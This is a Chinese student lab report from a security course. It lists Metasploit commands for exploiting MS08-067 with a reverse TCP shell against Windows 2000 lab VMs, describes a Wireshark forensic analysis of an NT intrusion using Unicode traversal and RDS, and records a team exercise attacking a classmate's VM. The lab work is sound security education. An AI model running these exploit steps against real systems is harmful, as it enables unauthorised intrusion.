20231913 2023-2024-2 《网络攻防实践》实践六报告
1.实践过程
1.1 实践Metasploit windows attacker
输入msfconsole
输入search ms08_067 搜索一下ms08_067漏洞
输入 use exploit/windows/smb/ms08_067_netapi和show payloads,可以知道是可用于渗透攻击的
输入 set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接
输入 show options,展示渗透攻击需要设置的参数
输入 show targets 展示可渗透攻击的靶机的操作系统及版本
输入指令:set LHOST 192.168.200.4 设置渗透攻击的主机是kali虚拟机
输入指令:set RHOST 192.168.200.124 设置渗透攻击的靶机是Win2k虚拟机
输入exploit开始渗透攻击
1.2 取证分析实践:解码一次成功的NT系统破解攻击
用wireshark打开学习通上的.log文件
找到213.116.251.162和172.16.1.106的数据流
右键选择追踪流,TCP流
追踪一个数据流,发现【%C0%AF】为Unicode编码,由此判断攻击者进行了Unicode攻击以打开boot.ini文件,因此存在Unicode漏洞攻击
继续追踪数据流,发现有shell语句和"ADM!ROX!YOUR!WORLD",判断攻击者通过shell指令对目标进行操作,并且,还利用了RDS漏洞允许任意代码执行的缺陷进行了操作
1.3 团队对抗实践:windows系统远程渗透攻击和分析
攻击方IP:192.168.236.251(20231913zc)
防守方IP:192.168.236.78(20231914yzy)
先将自己的虚拟机和靶机连到同一环境下试试
关闭kali,将其设置成桥接模式,让其连到自己的手机热点上
win2k靶机这里也要设置一下自动获取ip地址
桥接之后win2k的ip地址
桥接下kali的ip地址
kali和win2k ping通了
按照之前渗透攻击的步骤,渗透攻击靶机192.168.236.211
可以发现成功在靶机c盘里创建文件夹cangdao
wireshark内也能发现相关的TCP数据流
接下来开始真实地进行攻击他人电脑的虚拟机
攻击方IP:192.168.236.251(20231913zc)
防守方IP:192.168.236.78(20231914yzy)
和之前一样将ms08_067作为漏洞进行攻击
在靶机192.168.236.78里创建文件夹,并在文件夹里创建txt文件
可以在yzy的靶机上发现我创建的文件夹20231913zc,以及文件夹里的txt文件
wireshark里也能找到相关的TCP数据流
2.学习中遇到的问题及解决
- 问题1:团队实践中两个人的攻击机和靶机很难连通
- 问题1解决方案:攻击机和靶机都设置为桥接模式,并把两台电脑同时连接在同一局域网下,同时设置一下win2k的网络连接为自动获取ip
3.实践总结
通过本次实验,进行了Windows操作系统安全攻防实践,动手实践Metasploit windows attacker,对解码一次成功的NT系统破解攻击进行了取证分析实践,最后进行了团队对抗实践,对windows系统远程渗透攻击和分析。通过进行实践,加深了我对于windows系统安全的理解。但同时由于自身能力原因还有部分实践要求可能没有达成,希望在以后的实践中可以做的更好。